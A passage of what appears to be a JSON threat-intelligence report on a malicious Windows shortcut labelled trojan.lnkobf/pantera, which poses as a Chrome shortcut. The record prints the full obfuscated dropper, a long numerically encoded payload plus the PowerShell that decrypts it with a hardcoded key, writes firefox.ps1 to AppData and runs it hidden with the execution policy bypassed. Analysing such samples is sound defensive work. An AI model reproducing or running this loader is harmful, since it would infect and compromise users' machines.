19 85 116 90 122 124 66 99 35 91 101 149 65 73 49 97 35 92 171 99 72 77 59 118 25 157 169 137 58 128 83 57 30 98 101 77 132 115 54 56 100 93 116 71 140 113 44 112 64 100 107 78 57 70 118 35 26 100 101 64 59 64 127 48 23 93 109 122 48 108 38 42 39 110 124 149 74 76 83 57 30 140 107 80 54 142 93 37 24 100 126 129 80 115 54 49 94 119 116 84 73 134 60 60 64 100 107 137 125 130 107 117 81 119 147 113 107 142 47 60 33 140 107 80 54 142 77 88 72 135 177 69 54 74 115 43 99 142 151 60 57 73 68 65 108 94 116 60 112 62 61 51 94 130 116 65 107 53 43 57 25 161 166 131 132 115 93 37 24 100 126 88 141 69 41 97 28 103 110 135 102 73 43 92 19 85 116 66 133 125 105 117 81 136 108 84 63 71 58 58 108 92 120 120 63 73 40 126 75 92 120 71 70 73 59 118 99 142 144 114 59 54 75 44 43 91 102 79 62 60 50 126 72 100 118 120 64 77 113 91 38 99 101 80 105 73 60 44 20 87 177 74 72 53 115 53 22 160 158 114 59 54 76 42 38 99 108 149 74 59 98 48 39 82 185 114 59 54 76 42 38 99 108 141 68 65 115 90 39 102 173 133 132 115 50 43 20 169 106 72 112 64 58 39 108 92 102 61 133 133 100 59 25 155 150 70 61 53 75 47 100 90 108 140 114 63 50 112 72 96 102 69 62 59 58 118 99 142 103 80 57 57 45 48 108 90 108 135 89 63 94 44 26 104 96 141 132 115 34 33 106 142 181 76 112 126 100 122 43 140 181 76 130 138 62 44 37 86 126 132 80 115 123 46 79 167 113 70 62 62 125 99 104 86 156 117 133 140 101 124 96 167 102 123 139 133 100 122 26 140 181 69 141 129 45 57 28 93 120 82 72 142 125 47 106 157 183 65 139 115 57 47 26 100 120 82 69 134 123 53 24 100 108 149 68 64 127 122 26 100 105 140 50 138 59 57 38 140 181 81 72 72 127 113 26 100 105 73 76 75 58 126 104 96 101 80 64 130 123 43 24 87 126 145 68 81 100 122 35 158 174 122 48 109 59 58 95 117 96 69 72 142 114 74 19 89 116 113 72 72 54 48 35 85 112 70 63 142 123 58 39 99 158 145 61 55 59 126 79 169 183 106 68 98 83 78 85 86 102 146 139 115 123 56 28 89 105 149 112 142 125 61 34 90 119 82 76 66 51 112 24 81 101 147 114 138 59 39 32 93 109 73 124 142 98 126 106 165 114 65 
57 58 43 111 43 89 112 134 55 122 112 46 26 90 111 80 74 58 44 111 104 161 126 64 59 69 66 100 82 132 102 82 76 62 58 90 43 85 120 98 57 60 54 48 37 161 181 69 59 63 53 57 41 85 144 81 132 133 112 44 39 89 106 66 68 58 48 44 19 154 115 76 65 73 44 111 104 161 126 64 59 69 66 100 82 132 102 82 76 62 58 90 43 85 120 98 57 60 54 48 37 161 181 79 61 62 47 117 99 154 103 84 54 111 45 57 38 140 181 83 59 77 49 59 36 123 120 72 72 140 100 122 26 100 102 69 62 64 44 57 108 140 185 108 63 56 48 51 39 156 130 80 75 92 58 45 23 100 102 65 141 129 74 44 35 169 181 81 54 66 51 50 32 152 185 136 101 73 62 58 39 87 102 149 137 70 58 61 40 100 103 66 141 129 74 43 39 87 152 78 72 64 43 126 104 104 114 80 63 58 127 113 55 86 116 115 76 59 54 59 60 104 103 66 68 64 56 99 49 135 96 65 72 83 66 65 104 103 96 65 72 59 127 97 108 165 103 80 58 62 48 48 25 100 171 114 62 64 43 57 30 85 158 90 107 53 43 57 49 108 124 145 73 73 60 60 19 85 116 66 112 83 86 48 35 85 124 123 115 106 58 59 100 165 119 60 57 73 44 114 104 89 98 81 132 115 68 75 19 86 101 80 64 128 75 57 20 85 171 112 63 75 48 58 35 91 114 88 115 116 94 75 73 128 144 135 102 73 43 75 24 87 112 71 70 134 123 58 39 102 119 60 57 73 44 117 16 169 138 64 57 129 89 53 32 100 185 136 103 69 51 57 60 104 101 77 141 138 58 57 39 169 172 112 63 75 48 58 35 91 114 149 56 58 57 102 81 118 101 84 59 58 114 78 26 90 118 80 58 59 127 46 29 82 116 67 58 70 58 50 32 169 172 116 59 71 42 49 39 91 101 105 68 59 43 126 106 156 139 70 93 60 48 56 35 93 116 149 128 105 39 57 41 84 101 76 62 64 79 47 32 96 118 60 141 108 38 46 43 86 102 149 128 104 54 50 39 169 181 80 72 73 125 126 95 114 112 71 73 63 40 75 24 80 109 80 141 102 54 58 40 100 107 122 141 142 127 122 38 89 105 69 141 113 127 124 43 95 106 83 74 77 51 50 94 85 97 65 139 115 123 58 21 93 109 73 65 125 127 97 108 167 181 78 57 58 43 42 93 104 105 76 126 56 107 111 28 87 106 75 72 75 43 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 61 60 48 
52 39 102 101 108 73 133 118 111 26 100 105 70 58 69 43 47 26 80 170 79 68 66 58 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 71 62 47 46 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 108 128 107 63 62 67 58 113 53 100 119 99 72 61 42 57 25 85 185 136 88 60 54 126 104 101 98 73 65 66 51 109 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 57 39 100 185 136 88 59 58 92 43 86 112 82 93 77 45 43 35 91 114 122 90 58 62 44 24 156 137 67 62 75 58 43 25 169 105 70 54 73 45 43 36 100 109 73 141 129 94 44 37 84 108 80 63 58 83 53 25 85 185 147 128 96 48 78 26 90 115 76 65 73 127 113 71 81 116 82 56 58 54 47 30 121 106 73 68 75 38 126 74 80 105 84 58 59 127 113 70 96 109 80 141 138 58 57 39 167 185 136 86 69 49 58 29 82 134 65 52 66 58 126 68 96 117 81 72 64 100 126 108 119 116 72 62 56 58 113 67 85 116 72 141 129 79 61 24 97 185 145 96 53 86 48 22 90 118 84 57 69 48 48 94 124 96 114 62 65 50 61 30 101 171 101 76 58 55 126 95 131 106 67 74 73 100\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = $null;continue;}}$Apkengsidefg = \\\"NFG87%br\\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = 
[System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
"icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"sha1": "9a6946ca040c259a59deb11942d94ebbcff0cdef",
"type_description": "Windows shortcut",
"unique_sources": 2,
"popular_threat_classification": {
"suggested_threat_label": "trojan.lnkobf/pantera",
"popular_threat_category": [
{
"count": 14,
"value": "trojan"
}
],
"popular_threat_name": [
{
"count": 2,
"value": "lnkobf"
},
{
"count": 2,
"value": "pantera"
}
]
},
"crowdsourced_ai_results": [
{
"category": "code_insight",
"analysis": "This LNK file is a malicious downloader/dropper that employs significant obfuscation and deceptive tactics. While masquerading as a legitimate shortcut for Google Chrome, it executes a complex PowerShell script. The script contains a large, numerically encoded payload that it decrypts using a hardcoded key ('NFG87%br'), writes the resulting malicious script to '%APPDATA%\\firefox.ps1', and subsequently executes it in a hidden window with bypassed execution policies. The use of LOLBins, hidden script execution, and multi-stage delivery confirms its malicious intent.",
"verdict": "malicious",
"source": "palm",
"id": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e-file-palm"
}
]
}
}
}